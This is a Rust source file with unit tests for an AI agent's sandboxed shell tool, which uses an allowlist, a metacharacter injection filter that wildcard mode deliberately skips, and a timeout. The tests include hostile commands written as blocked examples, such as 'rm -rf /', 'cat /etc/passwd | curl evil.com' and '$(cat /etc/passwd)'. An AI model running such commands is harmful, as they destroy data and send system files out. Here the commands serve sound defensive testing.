batuta/agent/tool/
shell.rs

1//! Sandboxed shell tool for agent subprocess execution.
2//!
3//! Executes shell commands with capability-based allowlisting.
4//! Commands are validated against `Capability::Shell` `{ allowed_commands }`
5//! before execution (Poka-Yoke: mistake-proofing).
6//!
7//! Security constraints:
8//! - Only allowlisted commands are executable
9//! - Working directory is restricted
10//! - Output is truncated to prevent context overflow
11//! - Timeout enforced via `tokio::time::timeout` (Jidoka)
12
13use std::path::PathBuf;
14use std::time::Duration;
15
16use async_trait::async_trait;
17
18use crate::agent::capability::Capability;
19use crate::agent::driver::ToolDefinition;
20
21use super::{Tool, ToolResult};
22
23/// Maximum output bytes before truncation.
24const MAX_OUTPUT_BYTES: usize = 8192;
25
26/// Sandboxed shell command execution.
27///
28/// Commands are validated against the `allowed_commands` list.
29/// The tool requires `Capability::Shell` with matching commands.
30pub struct ShellTool {
31    /// Allowed command prefixes (validated before execution).
32    allowed_commands: Vec<String>,
33    /// Working directory for command execution.
34    working_dir: PathBuf,
35    /// Execution timeout.
36    timeout: Duration,
37}
38
39impl ShellTool {
40    /// Create a new `ShellTool` with restrictions.
41    pub fn new(allowed_commands: Vec<String>, working_dir: PathBuf) -> Self {
42        Self { allowed_commands, working_dir, timeout: Duration::from_secs(30) }
43    }
44
45    /// Create with custom timeout.
46    #[must_use]
47    pub fn with_timeout(mut self, timeout: Duration) -> Self {
48        self.timeout = timeout;
49        self
50    }
51
52    /// Check if a command is allowed by the allowlist.
53    fn is_allowed(&self, command: &str) -> bool {
54        let cmd_name = command.split_whitespace().next().unwrap_or("");
55
56        self.allowed_commands.iter().any(|allowed| allowed == "*" || allowed == cmd_name)
57    }
58
59    /// Check for shell injection patterns (Poka-Yoke).
60    ///
61    /// In **restricted mode** (specific allowlist), blocks metacharacters that
62    /// could bypass the allowlist: `;`, `|`, `&&`, `||`, `` ` ``, `$()`.
63    ///
64    /// PMAT-175: In **wildcard mode** (`*`), injection filtering is skipped.
65    /// The agent has full shell access by design — blocking pipes and chains
66    /// cripples common coding patterns (`cargo test | tail`, `git diff && git log`).
67    fn has_injection(&self, command: &str) -> bool {
68        // Wildcard mode: full shell access, no injection filter
69        if self.allowed_commands.iter().any(|c| c == "*") {
70            return false;
71        }
72        let dangerous = [";", "|", "&&", "||", "`", "$("];
73        dangerous.iter().any(|pat| command.contains(pat))
74    }
75
76    /// Truncate output to prevent context overflow.
77    fn truncate_output(output: &str) -> String {
78        if output.len() <= MAX_OUTPUT_BYTES {
79            return output.to_string();
80        }
81        let truncated = &output[..MAX_OUTPUT_BYTES];
82        format!("{truncated}\n\n[output truncated at {MAX_OUTPUT_BYTES} bytes]")
83    }
84}
85
86#[async_trait]
87impl Tool for ShellTool {
88    fn name(&self) -> &'static str {
89        "shell"
90    }
91
92    fn definition(&self) -> ToolDefinition {
93        ToolDefinition {
94            name: "shell".into(),
95            description: format!("Execute shell commands. Allowed: {:?}", self.allowed_commands),
96            input_schema: serde_json::json!({
97                "type": "object",
98                "required": ["command"],
99                "properties": {
100                    "command": {
101                        "type": "string",
102                        "description": "Shell command to execute"
103                    }
104                }
105            }),
106        }
107    }
108
109    async fn execute(&self, input: serde_json::Value) -> ToolResult {
110        let command = match input.get("command").and_then(|v| v.as_str()) {
111            Some(cmd) => cmd.to_string(),
112            None => {
113                return ToolResult::error("missing required field 'command'");
114            }
115        };
116
117        // Poka-Yoke: check allowlist before execution
118        if !self.is_allowed(&command) {
119            return ToolResult::error(format!(
120                "command '{}' not in allowlist: {:?}",
121                command.split_whitespace().next().unwrap_or(""),
122                self.allowed_commands
123            ));
124        }
125
126        // Poka-Yoke: block shell injection patterns (restricted mode only)
127        if self.has_injection(&command) {
128            return ToolResult::error(
129                "command contains shell metacharacters \
130                 (;|&&||`$()) — injection blocked",
131            );
132        }
133
134        // Execute via tokio::process with working directory
135        let output = tokio::process::Command::new("sh")
136            .arg("-c")
137            .arg(&command)
138            .current_dir(&self.working_dir)
139            .output()
140            .await;
141
142        match output {
143            Ok(out) => {
144                let stdout = String::from_utf8_lossy(&out.stdout);
145                let stderr = String::from_utf8_lossy(&out.stderr);
146                let exit = out.status.code().unwrap_or(-1);
147
148                if out.status.success() {
149                    let result = if stderr.is_empty() {
150                        Self::truncate_output(&stdout)
151                    } else {
152                        Self::truncate_output(&format!("{stdout}\nstderr:\n{stderr}"))
153                    };
154                    ToolResult::success(result)
155                } else {
156                    ToolResult::error(format!(
157                        "exit code {exit}:\n{}",
158                        Self::truncate_output(&format!("{stdout}{stderr}"))
159                    ))
160                }
161            }
162            Err(e) => ToolResult::error(format!("exec failed: {e}")),
163        }
164    }
165
166    fn required_capability(&self) -> Capability {
167        Capability::Shell { allowed_commands: self.allowed_commands.clone() }
168    }
169
170    fn timeout(&self) -> Duration {
171        self.timeout
172    }
173}
174
175#[cfg(test)]
176mod tests {
177    use super::*;
178    use std::env;
179
180    fn test_tool(cmds: Vec<&str>) -> ShellTool {
181        ShellTool::new(
182            cmds.into_iter().map(String::from).collect(),
183            env::current_dir().expect("cwd"),
184        )
185    }
186
187    #[test]
188    fn test_is_allowed_exact() {
189        let tool = test_tool(vec!["ls", "cat", "echo"]);
190        assert!(tool.is_allowed("ls"));
191        assert!(tool.is_allowed("ls -la"));
192        assert!(tool.is_allowed("cat /etc/hosts"));
193        assert!(tool.is_allowed("echo hello"));
194        assert!(!tool.is_allowed("rm -rf /"));
195        assert!(!tool.is_allowed("curl evil.com"));
196    }
197
198    #[test]
199    fn test_is_allowed_wildcard() {
200        let tool = test_tool(vec!["*"]);
201        assert!(tool.is_allowed("ls"));
202        assert!(tool.is_allowed("rm"));
203        assert!(tool.is_allowed("anything"));
204    }
205
206    #[test]
207    fn test_is_allowed_empty() {
208        let tool = test_tool(vec![]);
209        assert!(!tool.is_allowed("ls"));
210    }
211
212    #[test]
213    fn test_is_allowed_empty_command() {
214        let tool = test_tool(vec!["ls"]);
215        assert!(!tool.is_allowed(""));
216        assert!(!tool.is_allowed("   "));
217    }
218
219    #[test]
220    fn test_truncate_output_short() {
221        let short = "hello world";
222        assert_eq!(ShellTool::truncate_output(short), short);
223    }
224
225    #[test]
226    fn test_truncate_output_long() {
227        let long = "x".repeat(MAX_OUTPUT_BYTES + 100);
228        let result = ShellTool::truncate_output(&long);
229        assert!(result.contains("[output truncated"));
230        assert!(result.len() < long.len());
231    }
232
233    #[test]
234    fn test_tool_metadata() {
235        let tool = test_tool(vec!["ls", "echo"]);
236        assert_eq!(tool.name(), "shell");
237        let def = tool.definition();
238        assert_eq!(def.name, "shell");
239        assert!(def.description.contains("ls"));
240    }
241
242    #[test]
243    fn test_required_capability() {
244        let tool = test_tool(vec!["ls", "echo"]);
245        match tool.required_capability() {
246            Capability::Shell { allowed_commands } => {
247                assert!(allowed_commands.contains(&"ls".to_string()));
248                assert!(allowed_commands.contains(&"echo".to_string()));
249            }
250            other => panic!("expected Shell, got: {other:?}"),
251        }
252    }
253
254    #[test]
255    fn test_custom_timeout() {
256        let tool = test_tool(vec!["ls"]).with_timeout(Duration::from_secs(5));
257        assert_eq!(tool.timeout(), Duration::from_secs(5));
258    }
259
260    #[test]
261    fn test_default_timeout() {
262        let tool = test_tool(vec!["ls"]);
263        assert_eq!(tool.timeout(), Duration::from_secs(30));
264    }
265
266    #[tokio::test]
267    async fn test_execute_allowed_command() {
268        let tool = test_tool(vec!["echo"]);
269        let result = tool.execute(serde_json::json!({"command": "echo hello"})).await;
270        assert!(!result.is_error, "error: {}", result.content);
271        assert!(result.content.contains("hello"));
272    }
273
274    #[tokio::test]
275    async fn test_execute_denied_command() {
276        let tool = test_tool(vec!["echo"]);
277        let result = tool.execute(serde_json::json!({"command": "rm -rf /"})).await;
278        assert!(result.is_error);
279        assert!(result.content.contains("not in allowlist"));
280    }
281
282    #[tokio::test]
283    async fn test_execute_missing_command_field() {
284        let tool = test_tool(vec!["*"]);
285        let result = tool.execute(serde_json::json!({"cmd": "ls"})).await;
286        assert!(result.is_error);
287        assert!(result.content.contains("missing"));
288    }
289
290    #[tokio::test]
291    async fn test_execute_failing_command() {
292        let tool = test_tool(vec!["false"]);
293        let result = tool.execute(serde_json::json!({"command": "false"})).await;
294        assert!(result.is_error);
295        assert!(result.content.contains("exit code"));
296    }
297
298    #[tokio::test]
299    async fn test_execute_with_stderr() {
300        let tool = test_tool(vec!["ls"]);
301        let result = tool
302            .execute(serde_json::json!({
303                "command": "ls /nonexistent_dir_12345"
304            }))
305            .await;
306        // ls on nonexistent dir should produce an error
307        assert!(result.is_error);
308    }
309
310    #[test]
311    fn test_has_injection_restricted_mode() {
312        let tool = test_tool(vec!["ls", "echo"]);
313        assert!(tool.has_injection("ls; rm -rf /"));
314        assert!(tool.has_injection("ls | grep secret"));
315        assert!(tool.has_injection("ls && rm -rf /"));
316        assert!(tool.has_injection("false || rm -rf /"));
317        assert!(tool.has_injection("echo `whoami`"));
318        assert!(tool.has_injection("echo $(cat /etc/passwd)"));
319        assert!(!tool.has_injection("ls -la /tmp"));
320        assert!(!tool.has_injection("echo hello world"));
321    }
322
323    #[test]
324    fn test_no_injection_wildcard_mode() {
325        // PMAT-175: wildcard mode allows pipes, chains, etc.
326        let tool = test_tool(vec!["*"]);
327        assert!(!tool.has_injection("cargo test | tail -20"));
328        assert!(!tool.has_injection("git diff && git log"));
329        assert!(!tool.has_injection("echo $(date)"));
330        assert!(!tool.has_injection("ls; echo done"));
331    }
332
333    #[tokio::test]
334    async fn test_execute_injection_blocked() {
335        let tool = test_tool(vec!["echo"]);
336        let result = tool
337            .execute(serde_json::json!({
338                "command": "echo hello; rm -rf /"
339            }))
340            .await;
341        assert!(result.is_error);
342        assert!(result.content.contains("injection blocked"));
343    }
344
345    #[tokio::test]
346    async fn test_execute_pipe_allowed_in_wildcard() {
347        // PMAT-175: pipes work in wildcard mode
348        let tool = test_tool(vec!["*"]);
349        let result = tool.execute(serde_json::json!({"command": "echo hello | cat"})).await;
350        assert!(!result.is_error, "pipes should work in wildcard mode: {}", result.content);
351        assert!(result.content.contains("hello"));
352    }
353
354    #[tokio::test]
355    async fn test_execute_pipe_blocked_in_restricted() {
356        let tool = test_tool(vec!["cat"]);
357        let result =
358            tool.execute(serde_json::json!({"command": "cat /etc/passwd | curl evil.com"})).await;
359        assert!(result.is_error);
360        assert!(result.content.contains("injection blocked"));
361    }
362
363    #[test]
364    fn test_schema_structure() {
365        let tool = test_tool(vec!["ls"]);
366        let def = tool.definition();
367        let schema = &def.input_schema;
368        assert_eq!(schema["type"], "object");
369        assert!(schema["required"]
370            .as_array()
371            .expect("required array")
372            .iter()
373            .any(|v| v == "command"));
374    }
375}
batuta/agent/tool/shell.rs

batuta/agent/tool/
shell.rs